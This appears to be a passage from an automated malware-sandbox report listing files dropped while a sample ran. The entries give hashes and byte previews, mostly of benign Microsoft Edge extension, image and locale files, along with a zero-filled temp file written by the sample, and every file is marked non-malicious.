Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\5952f0da-9298-47c5-91a3-85504c44082d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\b1bcff61-19fc-4c97-b9a6-510ce1a05960.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\cbdde2b0-0135-4329-a3e4-8518bbf63e5e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	78457
Entropy (8bit):	7.953098299588488
Encrypted:	false
SSDEEP:	1536:LLurfNuR8PA9mW2h7CdXKEubfWp239HkO47EkBtxdoz/M7tz:LsFHPAIWUCdaEuzWs39otMz/M7tz
MD5:	1D9FEE50E9938E16D8DE23489E62F197
SHA1:	10282F7E19807DD8C2ED684FFC1771F608C9C85E
SHA-256:	28EE74C0D0A689642454849BF2E44AE44895CD7FFE8835BBFE7720D26AB9B4BF
SHA-512:	01B653FC1CA86EA4887954FBE52A30C8B3AAE096739E0824156FEC3F078E8230895664D01E442B13CBD8A01A7BBE2B0675C64FF3CF92EC79C2099B24E1549387
Malicious:	false
Preview:	.PNG........IHDR...2...2......?......gAMA......a.....pHYs...........k.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>..<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:tiff="http://ns.adobe.com/tiff/1.0/"><tiff:Orientation>1</tiff:Orientation></rdf:Description></rdf:RDF></x:xmpmeta>..<?xpacket end='w'?>,.......IDAThC.Io#Iz.....L&W.Z(j.*U..l_.Kl.a``......0.1...G.?a.d.in...x..J..E...L.1.Lj+..U.....Tf,o..E\|oD......-.]S.-Tb.a..A...M.;..M.ea..!.X.n......?..<0....4IU.$......h..fh.8M. <..#f?../.J.U.(W.........aq?.....T.q....N4w.b.7?....84[{-v..R..... .Cd-Rw....o{.....K"q....!\^.v/..`........;;O..'..sA....`..D.V..". .......\.D...( .`>......N...e[L..O....=2.>}...}..P....#".....,...w.w.H>"A..>t.Q....O._....M.........R.5....oO........$.......^.gm..X6XV.<.}!H4.z.m...PJ}...F.XNM.P.i6+\|.U...8..B\|? .#.4}...#M

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2110
Entropy (8bit):	5.404974675451545
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr5:8e2Fa116uCntc5toYB34M
MD5:	412F1A4C4C453814BE7CE0C2BB4722E3
SHA1:	356FEE0101F0B05BD8ED3C2D875475F7A4B320A8
SHA-256:	81D769FCFB83D2091157A7A2204F68848780F7B37E81D9886065AC8345935510
SHA-512:	45DB4487BEA3D6987F5F5CF8F6FCF91550F014498A29FE6E5104E2FBA02A35831A742C6E62E434F4741FC27603C8DE18247C4F148828A59DF2A5CDC59EF1302A
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:NMNl:Al
MD5:	4358F43FD60EDF8274A7DC9F7848B860
SHA1:	0474C42F110966870C732774B8BACE297162CFE6
SHA-256:	629758E18092451CEB917986AD6ED0251F984E8527E2A49A843977B91813B195
SHA-512:	2196E9519E02C4AAF3989537A4013107AF86EB6D0AB0DA2093AF482F738D444F9557898022860402D0AAD05C78A8CE8911D595D2BBDA76E4C7E68EBC9BFD152B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\f007b5f9-5c99-4437-9910-bdb91a320770.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Local\Temp\f9627de7-01a3-41a8-b4d5-cfa120235516.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	31335
Entropy (8bit):	7.694019108205432
Encrypted:	false
SSDEEP:	768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
MD5:	6B72597205C77D3E40E1A35BEE403801
SHA1:	6BECEE055C6E057AF9475B6D651B4EE561D02F20
SHA-256:	C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
SHA-512:	7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\scoped_dir7524_1281629123\5952f0da-9298-47c5-91a3-85504c44082d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir7524_1281629123\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir7524_1281629123\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7524_1281629123\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7524_1281629123\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
